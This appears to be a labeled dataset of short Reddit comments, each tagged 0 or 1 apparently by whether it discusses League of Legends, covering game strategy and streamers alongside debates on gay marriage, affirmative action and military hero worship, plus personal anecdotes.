1	They both are/were 2k+ Elo   Once i started watching streams one of the first i saw was VMans so let me tell you my story:   I was new, i already learned about the meta and knew most of the champions but i had like no experience. I am someone who learns a lot from viewing other people do it. VMan did great plays all the time and told what his teammates did wrong. Also he was very entertaining because he hyped every single action he did pretty hard.   I kept watching VMan, always trying to learn something and i learned a lot. But i learned more from what VMan did wrong. I think it started once he did Dragon with 3/0 lvl 6 Wriggles Lee Sin. It was warded and the enemys killed him. He blamed botlane, and i thought, why would he keept doing Dragon if they come? Why not just back off?   I kept watching his stream, recognizing more mistakes here and there, but he is a human, everyone does mistakes. Even when i didn't learn that much from him anymore i kept watching since he was entertaining, not in a emotinal-Ocelote way, more in a random-soloqueue-guy way. He flamed like everyone else, he played like everyone else.   Today i only turn in if i want a good laugh, he i still entertaining, he sings in stream, streams shirtless and not that unatractive (I dislike his haircut tho). But i wouldn't recommend him to anyone, he is like a afternoon talkshow. Everyone hates it, yet enough people watch it so they keep showing them.   Over the time he build kinda a relationship to a lot of viewers, they get a lot interaction. He answers questions from the chat 24/7 wich i really appreciate, and does a lot of fangames. At the end i want to say: VMan, stop flaming at everyone. Read the chat of your last ban, without the context it just looks like you are raging randomly at people.   So yeah, i liked VMan, he isn't one of my favored streamers anymore, so come at me downvotes ~.~
0	There are two issues you're not addressing here which completely change this argument     The government confers real and tangible benefits to married couples, therefore your musings on 'it is not something bestowed by the state' are irrelevant. I meant that, they are utterly irrelevant. It is a civil rights issue, because they are conferring special rights to heterosexual couples that they aren't conferring to same-sex couples. Because of this, the state must prove a compelling state interest in doing so, and conservatives know they cannot, hence the push for a national amendment.     This isn't some issue which we must wax poetic about; there are dozens of nation and areas which have allowed gay marriage, and there have been none of the vague societal effects you are concerned with. There have been dozens of studies which show that a child of a same-sex couple is not hampered, and in fact they show that a child in a same-sex household are significantly better off than one in a single parent household.
0	I'm not anti-military, I'm anti- troop hero worship. I have many friends who are veterans, as well as some who are still serving. I have nothing but respect for them and what they do. That said, none of these guys are heroes.   They're performing an important job and should be respected for it, but in my book, the term "hero" is thrown about way too willy-nilly. These are just guys doing a job, like anyone else.   It used to be that in order to be considered a hero you had to do something heroic, e.g. sacrifice yourself to save others, do something borderline crazy for the common good, etc. Now, largely thanks to the media, it's turned into an attendance prize.   I hate when people imply that every soldier is a hero - it's simply not true. I have a friend who has made the military his career. He's been in for 10 years now and is in requisitions. His entire career has been spent on domestic bases shuffling papers.   Another friend spent the entire first Iraq war sitting on an ammo dump in San Diego. His war stories involve trips to Tijuana strip clubs.  Point blank, these guys are not heroes just because they wear/wore the uniform. And it cheapens the term for people who have actually risked their lives and/or done heroic things.
0	Political correctness is not a concept to them.  They don't care very much what the world thinks of them on some things (porn, whaling, past war crime etc.).   That's the
1	I'm sure that the sisters were meant to be immortal though, with the gifts of magic that the watchers gave them, it would make sense for it to be anivia as a pheonix never dies, as it is just reborn and lissandra is already proven to be one.
1	The lore and the creative side is definitely covered. I would play it. But i don't know about the gameplay.   PvE? PvP? Of course you can make simple "kill XX porous and return their ripped out tongues to me" quests. But are there any big PvE enemies in the LoL Lore? Like WoW had Archimond, Illidan, Onyxia, Arthas etc.   Do you play a certain champion which is based on a role? Or phrased differently, can you pick one of the 117 champions and play them as if you are in a MMORPG? This would require A SHIT TON of work. Since a good balanced MMORPG would need more than 4 abilities on each character. Which would mean you need thousands of abilities, that all are customized on each champion and yet is balanced. Or do you play a human like Champion that regarding its role & race has some special abilities? (E.g. Yordle Tank. Special ability: Curse of the sad mummy)   Would PvE be instanced as well? For how many players?  Would PvP be like Capture the flag/Dominion?  What about E-sports? Is the LoL MMORPG Free2play? I do not think Riot would spend so much money into a MMORPG with only macro transactions.   Imagine: Summoners Rift, Twisted Treeline, Dominion, Howling Abyss. There is so much incredible Detail in the environment even though the gameplay in a moba is more important. It would require AGES to develop the whole world of LoL as an open world which satisfies the RIOT art standard.
0	I'm a chick, and farts are funny. I worked in an after-school program for several years. I also have severe IBS. We made the kids sit in lines according to their grade when we were transitioning activities. One day I had incredibly foul gas and didn't want to poison my coworkers, so I walked along the row with 1st grade and kindergarten and let it slip out silently as blanketed the entire line. It was fantastic. Every child was blaming someone different by the time I got back to the head of the rows. I clued in my co-workers and we sat back and enjoyed the show.
0	Well, it's not the same as Reddit, really. However, Reddit is full of purists who try to stick to the old laws of the internet.   It all started with 4chan, although, minor instances of viral content occurred before that time too. 4chan is to have credit for most viral image macros and internet pranks. Unfortunately, 4chan does not have the best reputation and that's, how I believe, Reddit rose to it's glory. Reddit, has some minor tweaks and uses a similar concept as 4chan.   Reddit's website concept allows content to be judged and spread easily. Thanks to Reddit, one does not have to lurk 4chan, camp several IRC channels or check one's emails every five minutes. Viral content, of interest, will automatically hit the front page. It's simple and centralised.   Reddit, basically, is the modern way of knowing if something went viral. So why spread something that has been seen by, probably, most internet users anyway? Only Trolls, Slowpokes and Karma-Whores do this. 9Gag, almost by definition, is ruled by Slowpokes. Since, Facebook users mostly get their content from 9Gag, they are probably ignorant Slowpokes.   Sorry, I got passionately sidetracked...going back on topic.   I am not sure how we came to Imgur, however, it's currently favoured by Redditors when it comes down to uploading images. I, personally, come from a time when Photobucket was preferred. The point is, that it all starts with the OP. The creator uploads it on the internet and shares it somewhere and the commonly depicted digestive cycle is as follows: 4chan > Reddit > Digg > Meme Base > Funnyjunk > 9Gag > FaceBook.   Naturally, it's a bit more complicated and the cycle has been changing. Especially FaceBook users, lately, have dared to cut in line, thus slowly changing the cycle. The way Facebook is made, any content directly shared on Facebook is likely to be endorsed by Circlejerks (why be friends with someone who doesn't like what you share?). It's a bad concept to make something go viral. IMO, they are untrue memes.   Ok, let me wrap this post up...because I think I can't get much closer to a good answer.   Bottom line is that the internet works in mysterious ways. Sometimes there is a good reason to do something, however, if 4chan taught us one important lesson, it's to:  "do it for the lulz" . Sometimes it's just fun to do something stupid or troll.
0	Your third and first points ignore the fact that we have a federal system of government, not one national government. For a long time many states did have official religions, but thanks to the arguments of Madison and Jefferson, opinion moved away from that. But you are absolutely wrong that it would absolutely be considered unconstitutional. The First Amendment was intended, in part, to prevent the FEDERAL government from obstructing STATE churches. It's not obvious even that the Bill of Rights applies to the states (as they mostly had their own bills of rights, and thus weren't even sure a national BOR was necessary), and later Supreme Court rulings are, contrary to your bluster, quite equivocal about the extent to which it applies.   Speaking generally, we can never get rid of the problem of having to deal with the wishes of the majority, no matter how many institutional checks and balances, and paper barriers, we put up between them. There is always the problem of tyranny of the majority-- it is always going to be pushing its pushy morality on us. And make no mistake about it-- despite what they say, gay marriage proponents are just as sanctimonious and moralistic about their opinion as gay marriage opponents, if not more so. Think about how angry they get if you disagree with them. That is not a sign of cold rationality, about an equitable distribution of benefits. It's a sign of moralistic passion.   So yea, you get special benefits if you're married. So what--you get special benefits if you buy a fuel-efficient or electric car, too. Government is allowed to use its taxing and spending powers to encourage or discourage certain activity, and while it usually makes some sort of argument about why that's a good idea, it doesn't have to.  There are some kinds of benefits that don't fall under those categories-- like you said, legal rights, like visitation, power of attorney, etc. But as these are conventional arrangements made by the state to recognize the presence of the family in civil society, I see no problem with them being discriminatory in the classical sense about whom to confer these rights on. On married couples, not on boyfriends or girlfriends. Not on the bestest of friends even if they are closer than any spousal relationship. If whole classes of people are being inconvenienced by these arrangements, I see no problem with them being changed by majority-elected legislatures, but there's no reason to get all moralistic about it, call it a civil right, ostracize and calumniate opponents, and congratulate yourself for your forward-thinking.   As for your second point, your argument is debatable, and the time frame is extremely narrow, but it's irrelevant anyway because gay marriage is a symptom, not a cause, of both prosperity and social upheaval.
0	You know, usually I would agree with this remark (I've worked multiple jobs in the food service industry), but I thought a lot about this "controversy" today.   I've been a line cook, made pizzas, and worked in fast food.   I'm usually a positive person with contentment as my baseline state of existence. Most people in these jobs are negative in the most dramatic sense of the word. They hate EVERYTHING. Work isn't so bad if you don't complain about it every 5 minutes. These people apparently never got that memo.   And Christ were the majority of them dumb. I wouldn't usually hold that against a person, but they were so... brazen about it. Flippant in their intellectual vacuity. It started to grate on me over the years at those various establishments.   I always used to just feel drained form even working near those kinds of people. I hung out with the servers as much as I could to get away from the cook staff.   It took some perspective after I left my last job as a cook to really realize why I was so unhappy while I was a cook. I have no problem whatsoever with the labor. I can just put my head down, take care of business, and joke around with the people who are receptive to it.   My point: I wouldn't really mind staying an extra 45 minutes if I was surrounded by positive people. More money for me. But I always just wanted to get far away from those miserable pricks ASAP.
0	i agree to not talk bad about the dead for the rest of the family, but i do not understand lying about the dead.... My grandmother was a horrible person who sued my mom for my late uncle's life insurance money. My mom inherited it from  due her being the only one to help him when he was alive. Grandmother only showed up to see if he died yet to "get her money".... At the funeral everyone cried and said how good of a person she was.... Me and one of my aunts stood around looking at everyone like they were crazy and making fun of the old bat.
0	Because a claim is not assumed to be false just because it hasn't been tested. It's an unverified claim, but to say that it's false before it is tested is unscientific.   Not necessarily, it's that you are probably associating the whole innocent (truth) until proven guilty (false), but it doesn't work that way in science. For testing myths, it could work either way but assuming truth to see if it's false is making logic work backwards.   For example, testing a myth like cellphone radiation you assume that cellphones cause cancer to find that cell phones don't cause cancer? soo...
0	Okay but what exactly set, say, Iraq apart from Syria or Darfur, other than misinformation about WMDs and ties to the Taliban?   Simply put, there was enough political will for an intervention. I do not, nor ever did, agree with the intervention if that is what you're getting at though.   >We have to be honest here, these kinds of operations are less about human rights and more about politics and gain, otherwise we would have done something about North Korea by now.   I think they're generally far more complex and nuanced than you're alleging. I think the Iraq war was in part an attempt to bring down the regime of a truly, truly, truly horrific dictator who gassed his own people. I think it was also a long term plan since the 90s by neocons who wanted to stabilize the middle east and therefore oil prices (while lining their pockets in the process).   I think North Korean people need outside military intervention because they live in a tyrannical failed state. I also think any intervention would undoubtedly be portrayed as a geo-political ploy by some, regardless of the human rights element. I also think that it would line the pockets of th military industrial complex just as Iraq did.   See what I'm getting at? These interventions seem really necessary and great before any boots are put on the ground. But when they are, and people start dying, and people start to profit, and people point fingers, nearly any intervention will look like another Iraq to at least some people.
1	Well, he's one of the rarest (he's more popular now, kudos to Asia/LCS) ADCs. I think a lot of people generally associate rare with bad. Twitch was, for a long time, the highest winrate ADC in the game and has only as of recent nerfs fallen from that, and most people don't realize that especially at low-elo.   He's certainly still a hypercarry, he just lacks a manageable early game that other ADCs don't. It's rather easy to bully a Twitch as he's not very mobile, his escape is unreliable, and his range is extremely short without any sort of instantaneous gap closer or extender.   Given that, in an even team-fight oriented game, Twitch is probably the strongest ADC to have packed in your arsenal. He has the highest damage potential in the game as well as the longest range during his ultimate. But at the same time, he is the most susceptible to dive comps and takes some significant ramping up to be powerful. As per his hypercarry status, I think he's fine. I don't think the E nerfs were necessary though, as I believe he was already rather weak early game in a normal 2v2 scenario (1v2 is different) and the nerf to his E just makes wave clearing/pushing and CSing even more difficult for a champ that already struggles significantly with it.
0	Dropping weights if you're lifting heavy prevents damage that setting the weights down gently does not, iirc. Especially with heavy stuff.   Grunting is also a sign of exertion and helps some people. It's part of going to the gym.   As for planet fatness, it's a judgement free zone, but there's a lunk alarm to judge me when I go to lift and drop some weights after my set, in order to prevent muscle damage.
1	You need to look at support differently. The days of pure "supports" are gone. You are now, what I like to call, a hybrid-support. Hybrid-supports are people who are both the support and another role.   Mage-Supports: Zyra/Annie/Cassiopeia/Morgana/Nidalee/etc.   Mage-Supports are supports who play and build like a standard mage. You still do the job or warding, peeling and protecting, but you sacrifice some utility for damage. You play teamfights like a mage (Sometimes peeling, sometimes nuking, sometimes just AOE'ing and trying to dish out as much damage as possible. All depends on the scenario).   Tank-Support: Thresh/Leona/Alistar/Blitscrank etc.   Tank-supports have the job of being both a support and a damage soak for teamfights. In teamfights they generally either peel or sit on the backline helping people take down the enemy's priority targets.   Bruiser-Supports:  Rengar/Xin/Lee Sin/Jarvan/Elise/Pantheon etc.   Your job is generally more focused around killing the enemy in teamfights. This lane is more kill-lane focused where you try to snowball a advantage early and then after lanning phase you are focused around killing off the enemy backline.   ADC-Supports:  Varus/Ashe.   ADC-Supports were a odd thing S3 but with the current gold that supports get it is more viable. It only works with utility based adc's (Varus and Ashe mostly) and build double gp10(Currently Targon's and Avarice blade, Targons OP), then Sightstone and then ADC items. You give your CS to your main ADC of course.   UtilitybasedMage-Supports:  Janna/Lulu/Nami etc.   Similar to the Mage-Supports, these are characters that you build AP on. The difference is that Mage-Supports sacrifice utility for damage while UtilitybasedMage-Supports have more utility then damage. The primary focus of them is peeling, while they can still do some damage.     Outside of teamfighting though the supports job is to keep map vision (I know it is limited but it is still possible), deny vision, protect your ADC and farm.   You said you can't farm lanes or jungle since your carries are doing that. That is not true. Unless you are a Tank-Support or a UtilitybasedMage-Support, you should be farming too. If no one is at wraiths then take those wraiths. If no one is taking that mid farm then take it. As a mage you WILL do as much damage as your mid. As a bruiser you WILL be as impactful as top in fights. Farm is not wasted on you because it goes directly into buying items that will impact teamfights. Yes your ADC should get it if it is possible, but if no one else is taking those wolves just take it.
1	If you're worried about having loads to learn, then don't. Learn it at your own pace, not when you think you should (IE straight away). I played whatever for the first 6 months of playing, didn't give a crap at all.   Now I learned a heck of a lot at the pace I wanted. I've been playing this game for 2 years now and even have the knowledge to be a (novice) colour caster for friendly tournaments my friends' uni hosts.
0	Bring on the downvotes.   Alright, this bill is being blown out of proportion; before hopping on this bandwagon take the time to read it.  It is not SOPA-equivalent, it does not censor the internet. No DNS shall be blocked, nor website shut down. This is a bill that has been in the works for a while meant to modernize ancient copyright laws.  Do I feel nervous about some parts? Absolutely! Namely 47. Section 41.1 pending some ambiguity, and maybe 35. Section 31.1 for the same reasons. This bill hopes to implement a relevant copyright law merely  PAR  with many other countries, and to protect Canadian content! Phone your representatives and tell them the parts you have problems with!
0	Ironically, poor people tend to carry around all of their cash with them, usually in the form of large bills because that's what they were given when they cashed their check. On the other hand, I'm working a steady job and only ever use cash for anything maybe once per week.   More importantly, you'll never spend less money attempting to find the fraud than you lose from the fraud. It's the same reason they don't test welfare recipients. If you're going to put more money into the system, help people, don't use it trying to restrict people.
1	I don't understand the point of this. You basically just said that you will queue with the same people that you're queuing with now. Which is common sense. Your conclusion/
0	I don't normally say
0	If you (the bullied) are thrilled about someone's death (the bully), you might not be any better.   You are missing something here... ah, yes - logic.  Being happy that someone who tormented you (especially if they did it for  years ) does not put you on the same level as the tormentor.  Whom does one hurt by being happy about the death of their tormentor?  Does one celebrating the death of a villain harm the villain? The villains parents? No.  No it does not.  In the end, the bully had an effect on everyone they ever bullied.  The person who was bullied though, their happiness/joy over the death of the bully doesn't effect anyone - and may be a relief for the enjoyer after years of struggling with the trauma they went through.
0	When I worked at Target, these two kids (little bro, big sis) got a hold of a skate board. They were riding around, making a big mess of the toys department. The big sis said she wanted to ride the board and the bro kept saying no.   So she gets mad and steps on the boy's skateboard right when he's about to take off. Literally jumps to the air and face plants straight to the ground, crying uncontrollably and the sis with a big "OH SHIT" on her face. And there I was, cracking up like hell in front of them.   Though, I did help the kid up and it took me forever trying to get their parents while calling them through the intercom.
0	They would tell me that if there was a situation they didn't want calls.   The problem is they are inconsistent with most of their "rules". For instance, my boss (the one I'm talking about in this meme) drafts proposals and has a certain amount of clients she personally deals with. The rest go to our sales person. I was told to keep track, because I didn't once, and my boss was very upset that a client was transferred incorrectly (and she complained to everyone who came to her office so I could hear it over and over).   So I made a list of all her clients and when one of them called, I screened it for her. She seemed bothered that I did that and just had me transfer to sales. So now I'm not sure what she wants.
1	Hi, fiora main here. Fiora is a great low elo pub stomper, because no one knows how to play against her, because everyone thinks she's awful. I go complete aggression when playing her, only build one defensive item toward the end. Her weakness is that she can't do anything against high armor champions (garen, renek), and high cc.and if she loses lane she'll suck the rest of the game. Anyway, in my elo, (silver 2) she's excellent because she's underestimated. I play her mid, or top if they didnt pick someone tanky. I often get dodged for playing her mid, but when i get into a game everyone goes very aggresive, and that's when I can win because she's underestimated, and people dont know how to play against her. I rarely lose mid, and i always do well.
0	I had to do this just recently. We had a wonderful relationship for a year, and then things went sour due to him finding another woman (which was okay with me because we are both poly and I have another man. however, this woman was BATSHIT). He kept insisting he could fix things despite this woman CONSTANTLY being completely disrespectful to our existing relationship and acting like she owned his entire existence from the moment she met him. For 8 or 10 months (i honestly lost track and stopped counting) I stayed in a relationship with him because I kept hoping he COULD fix things. Eventually I told him he needed to pick her or me and I left.   He always told me that "if push comes to shove, I will always choose you." I figured telling him that I was leaving if he didn't leave her was that shove. But he didn't leave her.   Every few days/weeks I would get an email or a facebook message from him saying he was through with her and all of her bullshit. They were having constant fights. Their relationship wasn't healthy from the get-go. He kept telling me he was going to move out of her house and leave her forever.   So I kept going back to him. I have never had a relationship in my life that was as long or constantly fulfilling as I had with him.   Last week I set down firm terms at which he is allowed to contact me. I told him I want all my stuff back that I left at their place, and I don't want to be in contact with him unless he is going to completely cut her out of his life. She has done a lot of stuff to both me and him. I am not comfortable around her anymore. I refuse to be in a relationship with someone who is even FRIENDS with someone I have hostile feelings towards, or who has hostile feelings toward me.   Still. . . every single day is a struggle. I told him in my terms that I am not going to be waiting around for him to pick me and ask me back into his life. But after all the things he said in the past. . . some small part of me really hopes he DOES love me enough to push his toxic relationship with this other woman out of his life. . . and ask me back again. There isn't a single day that passes where I don't wish I could just talk to him or hang out, or be in his arms.   But I can't. If I give in, I let the cycle continue. I let that happen for almost a year. I can't live that way anymore. It's too oppressive.
1	You're going to die until you play enough that your brain learns to instinctually respond with the right behavior.  Of course it helps to have conscious awareness of fundamentals, but the kind of mental processing you need to succeed develops mostly from trial and error.   Yeah the right champ can help (a known unknown), but really, the problem is that you don't even know what you're doing wrong (too many unknown unknowns) and also your reflexes (since you're new) are not trained.  To confound this, reflexes develop at different rates in different people.  So you need to:     A) Learn fundamentals like positioning and map awareness to the point where it's unconscious (like spotting a car in your mirrors, like remembering to check the blind spot before changing lanes).     B) Know your available resources to the point where you are very aware in an implicit way how much punishment you can take vs. give out within the span of a few seconds, so you can be effective in fights & survive towerdives (burst damage is almost always more important than your overall DPS).       I'm going from total noob with lots of negative ratios to usually going positive k/d/a so long as I use a champ I'm used to and so gotten that unconscious understanding.   I'm not going to give you any champ recommendations.  I'd say play as many different champs as possible as much as possible because you'll get way better not having a set pattern of how to play imprinted on your brain.  You'll have a thorough understanding of how much power your enemy has since you've played their champ enough.
0	well I guess I just don't know how to quote movies then. I'm sorry you feel so strongly about it and next time I'll second guess what I do on the internet. If somebody says I'm doing it wrong I'll just go ahead and make sure I correct that action for the future as to not cross that fine line of quoting a movie and making sure I don't step on anybody's toes. Heaven forbid somebody on the internet disagree or do something you didn't like. that would be devastating.
1	not quite (i think): assume:     there are 2 players, A with 4/1 win:loss rate and B with 3/2 win:loss rate.    i+-20lp for each game.         both start at 0lp        if they both play 5 games, A will have (on average) 60lp, and B will have 20lp.   If B then plays 15 more games (9 win/6 loss = +60lp), he will then be at 80lp. As long as your win rate is above 50%, you will on average always have a net gain in lp.   not 100% sure of this, so if i'm wrong can someone please correct my maths/lp knowledge! :)
0	Wow so many close-minded assholes in this thread. Stop saying that sociology isn't a real major, that he'll never find work or that medicine is the better career for OP regardless of what his interests/skills are. Just shut the hell up and let people pursue their passions. If you think that STEM majors are the only way for someone to have a good career then you're shockingly ignorant. We don't need legions of STEM students who hate their lives because they were pressured into it by dickwads.
1	Am I the only one who thinks this is bullshit? I have recently made the step from Bronze to Silver and most of my games have been more fun closer, more action, better understanding of the game  and less trolls,, granted there are still a few but not as much as I got in bronze, took me 10 games and in promo series already hoping to win this and then see where it takes me from there :)
1	Blaze as a team knew what to do against his amumu. In game 1, they have mundo to counterjungle amumu, plus they put their AD+Support in the mid lane to further help mundo counterjungle. They destroyed mid tier1 tower really quick, pressuring his jungle even more. After all of that, you can see the result, an underfarmed underleveled amumu
1	I went to a convention in highschool and there was a dance the last night. My mates and I all went. After an hour or so I got hungry. I knew they had gummi bears in bulk at the snack bar in the lobby. "Gummi bears is a brilliant idea I thought." So I bought a bag, ate some and put them in my pocket. Went back to dancing with some cute girl I had been flirting with all day. She mistook the gummi bears for an erection, got freaked out and walked the fuck away. I found out the next day.
0	I understand what you're saying and I don't disagree, per se. Change is slow. Society is evolving and it will continue to evolve in the direction of equality for the foreseeable future. I wouldn't be surprised if the changes you mention begin to take shape in the next generation or two. Remember, less than 100 years ago, women couldn't even VOTE. In under a century, the gender gap has closed considerably.   Will they ever be "equal"? No. Because men and women aren't equal. Women are tasked with the role of bearing children (if they so choose to have children). That automatically puts them into a position of weakness. Women generally make less than male counterparts because many, if not most, women pause their careers to start families and raise children while men traditionally follow their career to pay for it. Yes this is changing and we see more stay at home dads being socially acceptable, but I don't expect to ever be "equal". It's just a biological thing we as human beings must accept.   Furthormore, speaking to biology, women are generally smaller than men and forces them into socially into a position of submissiveness. Sure, we aren't clonking our women on the head with a club and raping them in a cave like animals, but our biological differences cannot be ignored. These biological differences shape our social dogma. It traditionally puts men into positions where they are expected to "claim and court their mate" because they are in the biological category of "dominance". They are expected to "fix cars" because they are "stronger". While women are expected to "raise children" because they are "more caring".   We can see how much society has changed by looking at our previous generations, but to expect true equality or to ignore biological differences is ludicrous. To answer your question, I don't think society will ever reach that point completely, but I believe we will see society continue to head in that direction.
0	Let me leave this here for you:   (First result when Googling 'First Past the Post')
1	Seriously, we're basically restricting Riot from expanding the Runeterra lore by begging incessantly for a new champ every time they mention an non-League of Legends character in the lore. I find it really annoying.
0	So, first, more power to you. You are being successful, keep saying that. You might say you are 'trying' but you aren't: if you are tracking your points, you aren't 'trying', you are 'DOING', okay?   Second, please be careful to not deprive yourself. That is the way to fall off the wagon. If you want a sweet treat, go get it! Then, track it and figure out how little points you have left. It's okay to feel panicky and upset that you are going to have a tough time staying on target, what you are doing is training your brain to make choices, to understand the trade-off. Sure, you can eat a candy bar, but that means the dinner you had planned is too large now, so you have to cut some portions in half. When your tummy is grumbling at 10 pm, think to yourself "Was that candy bar worth it? Should I have cut it in half instead?"   Third: Go to the meetings. Men tend to use the e-tools, and that's cool, but go to the meetings. The correlation between ultimate success on the program and meeting attendance is extremely high, the topics are often quite useful and you may find a bro in the meeting and you guys can compare notes on what is working and what is tricky. You don't have to do this alone!   Fourth: You are negotiating TWO major life changes at once, please be aware of that! You are transitioning yourself to a new you, with a new relationship to food However, the wife is going through the same things, and physiology/psychology/our culture tends to make things a bit harder for the ladies. Your relationship to her is ALSO changing, it's not a bad thing but be aware its not static.   If I may suggest some do's and don'ts:  Don't nag her about tracking or compliance. Do lead by example.  Don't lie about food, to yourself or her! Do help bring home healthy snacks and smart choices to put on the counter and in the pantry. Don't whine about only have 49 points, when she has 32. Do sympathize when she has a tough day. Don't expect super-dramatic weight loss for either of you. Do embrace and celebrate your successes and hers! Don't miss out on this bonding opportunity. Do use this time to add other healthy ideas and habits to your lifestyle (karate, walking/hiking, tennis, whatev)   Wow, didn't mean to sound so preachy, but its rare there is a topic on reddit I can contribute to.
1	Fan-created youtube parody songs? That's your opinion that the music is terrible but I think it's actually good intermission music, plus to see what match will be next so it keeps people tuned in. Also, League isn't supposed to be seen a sport, it's not a sport. It's an eSport. They already do announce players in the starting line up too so I don't think they need more of that.
1	It's against the rules but unless you wave your arms in the air saying this isn't my account you wouldn't have raised any red flags.   For all Riot knows you moved and are playing the game on a different IP.   It's one of those "spirit of the rules" things. They get their money by having you invest your time, which leads to things like XP or IP boosts and skins.   Also you aren't borrowing an account for riot, it's yours, they simply reserve the right to take it back if you break the terms of use.
1	you know, the problem with adc is, the kda and the gpm is'nt only the  achievement of the adc-player, everyone covers up their adc , because its the most important role in the teamfight, most toplaner etc build completly tanky and deal zero dmg , so ofc its the adc who gets the most gold/kills.   is there any adc we "hate"? rekkles,doublelift, turtle, we all call them godlike players with godyl mechanics while its most often also the succes of the team.
0	My best friend said something similar to this in high school all the time. I guess I always assumed she was saying "might as well." She made me a photo book with quotes and other girly junk for my 17th birthday & one of the quotes she picked had "might as well" in it. She wrote it how she said it, which I learned that day was "minus well"
1	my plan is to eventually start playing PVP, but I wanna get to know the ins and outs of the whole dance before I play against an opponent that doesn't let me make a mistake.   Bot matches are great for your first few games, they help you get use to how do the most basic things in the game (like move around, buy items etc.). However if you plan on playing pvp, don't use bots to "Learn how to play first", or to "work on your mistakes", due to the nature of the game, bots are really ineffective at this.   Firstly the only thing a bot will teach you to do, is defeat the bot. Most of the time, you defeat the bot by exploiting it in some way, this can be anything from constant ganking on one weak bot, or just ignoring the bot and last hitting so you have tons of farm, or other possible ways. But at the end of the day, most of what you've learned is just exploiting a program that isn't every capable of adapting, unlike human players.   Second, Bot are awful at showing where you need to improve, because often bots are a very bad at something (like last hitting), godly at other things (like reflexive actions), or don't actively part take in a major part of the game (like jungling, warding, and counter warding), causing you to have an extremely warped understanding of the game. Hell some item builds for a character might work well in a bot game, but is awful against real players.   ok, I've gotten board of writing this, and can't really remember where I was going with this, but what I wanted to say was... Start playing PvP, cause you don't know shit till you've gotten your feet good and wet. And don't let rage deter you, as everyone gets raged at, at some point. Some might be justified, some might be unjustified but it's going to happen better to learn how to deal with it now.
0	I am a white girl.  I got an $8k scholarship for academic merit and some Pell grants to go to college because my family was kind of poor.  People who bitch about how "minorities get in so easy and I'm fucked" just want an easy scapegoat.  I got into a well-ranked private school and actually paid less money to go there than public university.  Know why?  Private colleges have more grant money to give out.  I picked my college because they did need-blind admissions - they admitted you based on merit, then whatever your income, they will give you a package of grants+loans to cover it.  I was from a lower middle class family.  I thought public university would be cheapest but I was wrong.  Do your homework.   Now here are some problems with how people look at affirmative action.  Anybody nonwhite/non-Asian does not just get handed admission plus scholarship to whatever school they want.  You still have to have commensurate grades and such, depending on what kind of school you want to go to.  If you think anybody black can just apply to Harvard with a transcript full of D's, you are wrong.   Yes, minorities are sometimes admitted with lower scores than a white person who also applied.  A college will also accept lower scores football players, class presidents, first chair trombones, whatever over Joe Schmoe who had a 4.0 but wasn't as interesting.  I know you are going to say "but those people have skills they worked for, minorities were just born that way".  Tough shit.  Colleges want to create a diverse student body, which is defined by not just personal skills but also life experiences.  People from the inner city are overwhelmingly minorities and overwhelmingly have less access to a strong education that would give them better SAT scores.  Colleges don't just want whoever got the top 1000 SAT scores, they want variety of talents and experiences.   Also, most colleges are still nowhere near the actual demographics of minorities in the US in their student body, so clearly white people are still getting into college no problem.   Also, there are plenty of GLBT scholarships that nobody ever seems to complain about.  Why is it OK to hate on minority scholarships because "they were just born not white" but GLBT scholarships are OK?  People also generally don't complain about "legacy admissions" even though those students didn't do anything to deserve it.   Also, the FAFSA.  I have no contact with one parent and had to jump through a million hoops to not provide or have them count their income.  But I did it.  If you are not willing to do the work then blame your lazy ass or your parents for not helping you out.  There are ways to do it.  You can even declare yourself independent from your parents, but then you actually have to provide for yourself 100%.  So you can't live with your parents and then complain that the government won't give you money as if you were living on your own.
1	Lets start with runes: Page 1: Makes no sense, looks like you're going for a support page? The half-comittment runes do NOT work in this sense. If you are going magic resist for blues, go ALL the way, the 11 mana is useless in the short and long run. Change the gold/10, you get only 13 gold extra per minute which is barely enough if you're laning correctly. Armor is usually good here, or HP/level, call is up to you. Reds go all in on pen or flat ap/ad. Mana regen is again useless from what I'm seeing you're aiming for. Finally quints; this is OKAY if you want to run it, but better off going full hp or full move speed. Having minor bonuses really mean nothing.   Page 2: Ad page? Reds are fine. Blues and yellows are NOT optimized for AD. Usually these tend to be defensive/utility slots. If you're shooting for an ADC page; attack speed is good for both blues and yellows. Also flat armor is good for yellows while flat MR is good for blues. Quints with crit damage, this only works if you GET the crit, the vast majority of the time the rune would be completely usless. Get movespeed/health/flat ad/pen instead. You MAY have a random crit rune anywhere that gives you like 1% crit if you absolutely want that.   Page 3: Ap page, yeah? You do NOT want flat ap pure. That is just 100% silly. You are not doing yourself a favor for this minor burst in damage. If you're even slightly behind nothing will save you. Reds for AP are usually designed for penetration. You can get hybrid (my favorites) or just flat magic pen. Anything else here is pointless. Yellows should be either defensive in armor or hp/level. Best in slot for ap's. Blues can be flat ap if you wish, also CDR is good in slot along with magic resist. Dependent on your play style. I play very aggressive lane so I keep flat ap. The quints can stay ability power. HP also works to live through lane phase.   Page 4: A tanky page? Ad blues are NOTHING, better off getting MR since they provide WAY MORE mileage than 3 AD. If you're going tanky, you can swap the yellows for HP scaling for a bigger punch than the 9 armor or keep the 9 armor and swap your quints for movespeed/health for better mobility/tanking. Keep in mind defense gives more effective health, but health is health.   Page 5: ADC page I'm guessing? You need to roll with more lane minded runes instead of the long run since if you win lane you tend to win late. Reds should be AD for better cs'ing unless you want more pen if you trust in your csing and then get flat armor pen. Yellows are good to live with, can take attack speed also. For blues 1 random MR isn't going to cut it. Go all magic resist or attack speed, up to you. You  can  make the quints work, but better off going full. They would be better served to be move speed if you want to hunt people down, attack speed if you want win earlier, or ad to pack a harder punch. Keep in mind you need attack speed on one of the categories (blues/yellows/quints.)
0	Well, if we're using our grandparents as a reference, then yes.  They have earned the right to a retirement.  Our generation still has yet to earn the right to rest on our laurels.  Older generations have had to deal with the draft(s) and thus far all we have had to deal with is an entirely voluntary military, plus all the benefits of modern technology.  Sure we've experienced tragedies... but as a generation we haven't experienced anything remotely as tragic as D-Day, or any of the World Wars in general.  All we've been good for is a few Gulf wars and a bunch of shitty diplomacy.   All of this is not to say our current veterans do not also deserve a great retirement, as they certainly do.   My point is:  earlier generations dealt with much more shit than us.  They can say shit like OP's attempt at a meme because, well, their generation earned it.
